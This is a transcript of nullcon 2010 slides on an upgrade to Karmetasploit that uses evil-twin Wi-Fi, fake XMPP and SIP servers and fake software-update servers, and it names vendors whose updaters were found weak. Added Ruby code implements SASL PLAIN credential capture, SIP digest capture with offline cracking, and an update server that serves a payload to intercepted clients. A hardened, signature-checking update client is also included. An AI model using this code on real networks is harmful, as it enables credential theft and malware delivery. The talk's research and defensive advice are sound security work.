nullcon 2010 - the evil karmetasploit upgrade
DESCRIPTION
nullcon 2010 - The evil karmetasploit upgrade by Veysel Ozer
TRANSCRIPT
nullcon Goa 2010 http://nullcon.net
Veysel Oezer
The Evil Karmetasploit Upgrade
Overview
Introduction
Background
Title
Realization
Results
Conclusion
Demos in between!
Introduction
IT Security: increasing attacks
Introduction
IT Security: increasing attacks, also in Germany
Introduction
Know your enemy!
”So it is said that if you know your enemies and know yourself, you will fight without danger in battles. If you only know yourself, but not your opponent, you may win or may lose. If you know neither yourself nor your enemy, you will always endanger yourself.” (Sun Tzu, The Art of War)
Background
The man in the middle
The hacker tools
Evilgrade
Metasploit
Karma + Karmetasploit
The man in the middle attack
Known MitM attacks
ARP spoofing
DNS spoofing
BGP hacking
ICMP redirect, ...
Karma! The evil twin hotspot
The hacker tools
Background
Evilgrade
Framework for attacking weak update mechanisms
”The idea..is the centralization and exploitation of different update impl. all together in one tool”
Written in Perl and published 2007-2008
Existing modules: Sun Java, Apple OS X, Winamp, WinZip, Notepad++ and so on.
Evilgrade
How does it work?
Metasploit
Vulnerability development framework: reduces the work of creating an exploit
Penetration testing: several hundred exploits
#5 in the top 100 security tools
Written in Ruby and BSD licensed
"Don't try to teach yourself how to use metasploit under the security camera at the airport"
Metasploit architecture
Karma
The evil twin access point
MitM attack on Windows XP Wireless Zero Configuration... or just name it ”FreeWifi” ;)
After the MitM, steal authentication data: HTTP, FTP, POP3, IMAP and so on
Released in 2004
Karmetasploit
Reimplementation of Karma in Metasploit
Fake access point integrated into aircrack-ng (airbase-ng)
Authentication capturing implemented as auxiliary modules for Metasploit
Several improvements: better hardware support, cookie and form data stealing, browser exploitation
Goals
Evilgrade 2 Metasploit (E-2-M)
Reimplement the functionality as Metasploit modules
Improve the new system: port sharing, stealth mode, faster Metasploit payload generation
Transfer the existing Evilgrade modules into the new system
Create new fake servers: SIP and XMPP
Find new vulnerabilities in software
Fake XMPP
Based on TCP
Used for Jabber → instant messaging, Google Talk, ...
Has built-in strong security (STARTTLS for the stream, SASL for authentication), but it depends on server and client actually using it
Cleartext password transmission possible: a client that accepts SASL PLAIN on an unencrypted stream sends the password in the clear
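The cleartext path, as an added Ruby example that is not code from the talk or from Karmetasploit: the fake server answers the client's stream header with features that offer no STARTTLS and no challenge-response mechanism, only SASL PLAIN. A client that accepts sends base64("\0user\0password"), which the server simply decodes. The stream-features XML, the user name and the password are constructed for this example; the last function is the client-side check that makes the attack fail.

```ruby
require 'base64'

# Stream features the fake XMPP server advertises after the client opens the stream:
# no <starttls/> at all and PLAIN as the only SASL mechanism (constructed for this example).
FAKE_STREAM_FEATURES = <<~XML
  <stream:features>
    <mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'>
      <mechanism>PLAIN</mechanism>
    </mechanisms>
  </stream:features>
XML

# SASL PLAIN message as defined in RFC 4616: [authzid] NUL authcid NUL passwd, base64 encoded.
# This is what a client that accepts the offer puts into its <auth/> element.
def plain_auth_stanza(user, password, authzid = '')
  b64 = Base64.strict_encode64("#{authzid}\0#{user}\0#{password}")
  "<auth xmlns='urn:ietf:params:xml:ns:xmpp-sasl' mechanism='PLAIN'>#{b64}</auth>"
end

# Server side of the capture: pull the base64 blob out of the <auth/> element and split on NUL.
# Returns nil for anything that is not a well-formed PLAIN authentication.
def capture_plain_auth(stanza)
  m = stanza.match(%r{<auth\b[^>]*mechanism=['"]PLAIN['"][^>]*>([A-Za-z0-9+/=]+)</auth>})
  return nil unless m
  fields = Base64.strict_decode64(m[1]).split("\0", 3)
  return nil unless fields.length == 3
  authzid, user, password = fields
  { authzid: authzid, user: user, password: password }
rescue ArgumentError # malformed base64
  nil
end

# Client-side check that defeats the fake server: RFC 6120 allows PLAIN only on a
# TLS-protected stream, so a correct client refuses when STARTTLS was never negotiated.
def client_may_use_plain?(features_xml, tls_established)
  offers_plain = features_xml.include?('<mechanism>PLAIN</mechanism>')
  offers_plain && tls_established
end
```

Whether the capture works therefore depends entirely on the client: a client that enforces the TLS-before-PLAIN rule (or that only accepts a challenge-response mechanism such as DIGEST-MD5 or SCRAM) never hands the fake server anything usable.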
Fake Sip Server
UDP-based protocol
Redefined in several RFCs (RFC 2543, superseded by RFC 3261)
Authentication similar to HTTP Digest: challenge – response
Try a downgrade attack to make the client use Basic Authentication
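The challenge-response exchange and why capturing it is still useful even when the downgrade fails, as an added Ruby example that is not the talk's own fake SIP server: the fake registrar chooses realm and nonce, the phone answers with the RFC 3261 digest (shown in its simplest form, without qop), and because every input except the password is then known to the attacker, the password falls to an offline dictionary run. Realm, user name, nonce and wordlist are constructed for the example.

```ruby
require 'digest/md5'
require 'securerandom'

# --- Fake registrar side ---------------------------------------------------------
# Answer any REGISTER with a Digest challenge. Realm and nonce are the attacker's
# choice; a known nonce is what makes the captured response crackable offline.
def sip_digest_challenge(realm, nonce = SecureRandom.hex(16))
  ['SIP/2.0 401 Unauthorized',
   "WWW-Authenticate: Digest realm=\"#{realm}\", nonce=\"#{nonce}\", algorithm=MD5",
   'Content-Length: 0', '', ''].join("\r\n")
end

# RFC 3261 §22.4 digest without qop: response = MD5(HA1:nonce:HA2), where
# HA1 = MD5(user:realm:password) and HA2 = MD5(method:uri).
def sip_digest_response(user, password, realm, method, uri, nonce)
  ha1 = Digest::MD5.hexdigest("#{user}:#{realm}:#{password}")
  ha2 = Digest::MD5.hexdigest("#{method}:#{uri}")
  Digest::MD5.hexdigest("#{ha1}:#{nonce}:#{ha2}")
end

# --- Client side --------------------------------------------------------------------
# The phone's second REGISTER, now carrying the Authorization header.
def sip_register_with_auth(user, password, realm, uri, nonce)
  resp = sip_digest_response(user, password, realm, 'REGISTER', uri, nonce)
  ["REGISTER #{uri} SIP/2.0",
   "Authorization: Digest username=\"#{user}\", realm=\"#{realm}\", nonce=\"#{nonce}\", " \
   "uri=\"#{uri}\", response=\"#{resp}\", algorithm=MD5",
   'Content-Length: 0', '', ''].join("\r\n")
end

# --- Capture and offline crack --------------------------------------------------------
# Parse the Digest parameters (quoted or bare) plus the request method out of the raw message.
def capture_sip_digest(message)
  lines = message.split("\r\n")
  auth = lines.find { |l| l =~ /\AAuthorization:\s*Digest/i } or return nil
  params = auth.sub(/\AAuthorization:\s*Digest\s*/i, '')
               .scan(/(\w+)=(?:"([^"]*)"|([^,\s]+))/)
               .to_h { |k, quoted, bare| [k, quoted || bare] }
  params.merge('method' => lines.first.split(' ').first)
end

# Every digest input except the password is now known, so a dictionary run recovers
# it without ever contacting the real SIP server (and without any rate limiting).
def crack_sip_digest(cap, wordlist)
  wordlist.find do |pw|
    sip_digest_response(cap['username'], pw, cap['realm'], cap['method'],
                        cap['uri'], cap['nonce']) == cap['response']
  end
end
```

The Basic downgrade the talk tried would have skipped the cracking step entirely; when a client refuses it, the digest capture above is the fallback, and its value depends only on the strength of the SIP password.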
Realisation
Environments
Evilgrade 2 Metasploit
Authentication capturing servers
Analysis of update mechanisms
Used tools
Wireshark
Jacksum
VBinDiff
VMware Workstation
Netcat
GHex
Attack Environment
DEMO
Realisation E-2-M
Fake XMPP
Fake Sip Server
Analysis
1. Install an old version on the target.
2. Sniff the update process from the attacker's machine (in the MitM position).
3. Analyze the network communication.
4. If possible, try to simulate the update server.
5. If possible, install the latest version on the target.
6. Improve the server to be version independent.
7. Improve the server to allow configuring options, like the description shown to the client as update information.
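What steps 4, 6 and 7 converge on, as an added Ruby sketch that is not the talk's own Metasploit module: a fake update server that answers any reported version with a higher one, shows an operator-chosen description, and hands out the payload at the URL it advertised. The check URL, the parameter names and the JSON manifest are assumptions standing in for whatever the target's real protocol looks like after step 3; the payload bytes are a placeholder.

```ruby
require 'socket'
require 'json'

# Step 6, version independence: whatever version the client reports, claim one higher.
def bump_version(version)
  parts = version.split('.').map(&:to_i)
  parts[-1] += 1
  parts.join('.')
end

# Parse the client's update check, e.g. "GET /check?product=demo&version=2.0.3 HTTP/1.1".
# Path and parameter names are assumptions; a real target's come from the Wireshark trace.
def parse_update_check(request_line)
  m = request_line.match(%r{\AGET\s+(\S+)\s+HTTP/1\.[01]}) or return nil
  path, query = m[1].split('?', 2)
  params = (query || '').split('&').map { |kv| k, v = kv.split('=', 2); [k, v.to_s] }.to_h
  { path: path, version: params['version'] }
end

# Step 7: the text the user sees is an option of the server, not a constant.
def fake_manifest(client_version, description:, payload_path:)
  JSON.generate({ 'version' => bump_version(client_version || '0.0'),
                  'description' => description,
                  'url' => payload_path })
end

def http_response(body, status: '200 OK', content_type: 'application/json')
  ["HTTP/1.0 #{status}", "Content-Type: #{content_type}",
   "Content-Length: #{body.bytesize}", 'Connection: close', '', body].join("\r\n")
end

# One request, one response: the update check gets a manifest, the advertised URL gets the payload.
def handle_request(raw, description:, payload:, payload_path: '/download/update.exe')
  req = parse_update_check(raw.lines.first.to_s)
  return http_response('', status: '404 Not Found', content_type: 'text/plain') unless req
  if req[:path] == payload_path
    http_response(payload, content_type: 'application/octet-stream')
  else
    http_response(fake_manifest(req[:version], description: description, payload_path: payload_path))
  end
end

# Minimal serving loop (not started at load time). The client only reaches it because the
# MitM position (Karma plus a fake DNS answer) resolves the vendor's update host to this box.
def serve(port, description:, payload:)
  TCPServer.open('0.0.0.0', port) do |srv|
    loop do
      client = srv.accept
      raw = client.readpartial(4096)
      client.write(handle_request(raw, description: description, payload: payload))
      client.close
    end
  end
end
```

The request handler is kept separate from the socket loop so the response logic can be exercised against captured request lines without a listener; that is also how a new target's quirks (extra parameters, a different manifest shape) get folded in during steps 4 and 5.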
Results
Fake SIP and XMPP servers
Reimplementation of Evilgrade
Analysis of update implementations: not hacked / indirect hacks / hacked
Results – fake server
XMPP: works
SIP: the downgrade attack had no success; capturing of Digest authentication is working
DEMO
Results
Evilgrade in Metasploit
Reimplemented the old functionality
Old modules ported
Several improvements:
• All the ones mentioned
• Anti-virus bypassing for Metasploit payloads (DEMO at the end if time is left)
• Some others...
Results - Analysis
Not hacked:
uTorrent
Avira AntiVir
Foxit Reader
VLC (uses PGP)
Ad-Aware (the only one that uses SSL)
Spybot, AVG Antivir, Comodo Firewall, Picasa, ZoneAlarm, WinRAR, FlashGet, Camfrog, ...
Results – Not hacked
Not hacked: uTorrent uses binary signed data ?!?
Results – Not hacked
Not hacked: Avira AntiVir
Excerpt from the update index file MASTER.IDX:
CRDATE=20090505_1833<3f76d242c16a5491bfe98540f68c36c9>
Results – Not hacked
Foxit Reader and the fzip file format
Results - Analysis
Indirect hack:
Skype
QuickTime
Orbit Downloader
Miranda IM
DEMO
Results - Analysis
Hacked:
Trillian
Kerio Firewall
SuperAntiSpyware
FileZilla
GOM Player
DivX Player
Trillian update mechanism
Binary update information. Can you read that?
Trillian update mechanism
Binary update information
Results - Hacked
DEMO
Conclusion
The release candidate of the evil Karmetasploit upgrade is ready
No need for Evilgrade anymore
Several improvements compared to Evilgrade
New authentication capturing servers
Several weak update implementations found, in software with over 100 million downloads from www.cnet.com
Conclusion
Feature list for version 2:
• SIP downgrade attack on old SIP hardware
• Fake server for XMPP over HTTP
• Improve the design to handle Avira AntiVir
Feature list for version 3:
• Advanced stealth mode
• Intelligent fake DNS server
• Find more vulnerabilities
Conclusion
Software developers: please make secure software. Use standards and deny weak stuff by default.
And for the rest of us: be aware of these attack vectors. Do not install every ”important security update”. Do not trust security software by default. Do not trust the Internet, especially (public) WiFi networks.
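What "use standards and deny weak stuff by default" means for an update client, as an added Ruby example that is not from the talk: the weak client trusts an unauthenticated manifest and installs whatever it claims is newer, which is the pattern behind the "Hacked" column above; the hardened client verifies an RSA-SHA256 signature on the manifest with a pinned vendor key, refuses versions that are not newer than the installed one (so a replayed old manifest cannot push a downgrade), and checks the downloaded installer against the signed hash. The key pair, manifest layout and installer bytes are constructed here; a real deployment keeps the signing key offline and fetches the manifest over TLS as well.

```ruby
require 'openssl'
require 'json'
require 'digest'

# Vendor key pair, generated here for the example. The client ships only the public half, pinned.
VENDOR_KEY = OpenSSL::PKey::RSA.new(2048)
VENDOR_PUB = OpenSSL::PKey::RSA.new(VENDOR_KEY.public_key.to_pem)

# Vendor side: the manifest names the version and the SHA-256 of the installer and is signed.
def sign_manifest(key, version:, installer:)
  payload = JSON.generate({ 'version' => version, 'sha256' => Digest::SHA256.hexdigest(installer) })
  { 'payload' => payload,
    'sig' => [key.sign(OpenSSL::Digest.new('SHA256'), payload)].pack('m0') }
end

# Numeric dotted-version comparison; true only if candidate is strictly newer.
def newer?(candidate, installed)
  (candidate.split('.').map(&:to_i) <=> installed.split('.').map(&:to_i)) == 1
end

# The 2010 pattern: plain-HTTP manifest, no signature, install whatever the
# "server" says is newer. A fake update server in the MitM position wins outright.
def weak_client(manifest_json, installed, downloaded)
  m = JSON.parse(manifest_json)
  newer?(m['version'], installed) ? [:install, downloaded] : [:up_to_date, nil]
end

# Hardened client: verify the manifest signature with the pinned key, refuse anything that
# is not newer than what is installed, and bind the download to the signed hash.
def hardened_client(signed, installed, downloaded, pubkey = VENDOR_PUB)
  payload = signed['payload'].to_s
  ok = begin
    sig = signed['sig'].to_s.unpack1('m0')
    pubkey.verify(OpenSSL::Digest.new('SHA256'), sig, payload)
  rescue OpenSSL::PKey::PKeyError, ArgumentError
    false
  end
  return [:reject, 'bad signature'] unless ok
  m = JSON.parse(payload)
  return [:reject, 'not newer than installed'] unless newer?(m['version'], installed)
  return [:reject, 'installer hash mismatch'] unless Digest::SHA256.hexdigest(downloaded) == m['sha256']
  [:install, downloaded]
end
```

Note the order of the checks: the signature is verified before the JSON is even parsed, so an attacker-controlled manifest never reaches the version logic, and the hash check means that a MitM who can still swap the download on the wire gains nothing either.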
That's it !
Q & A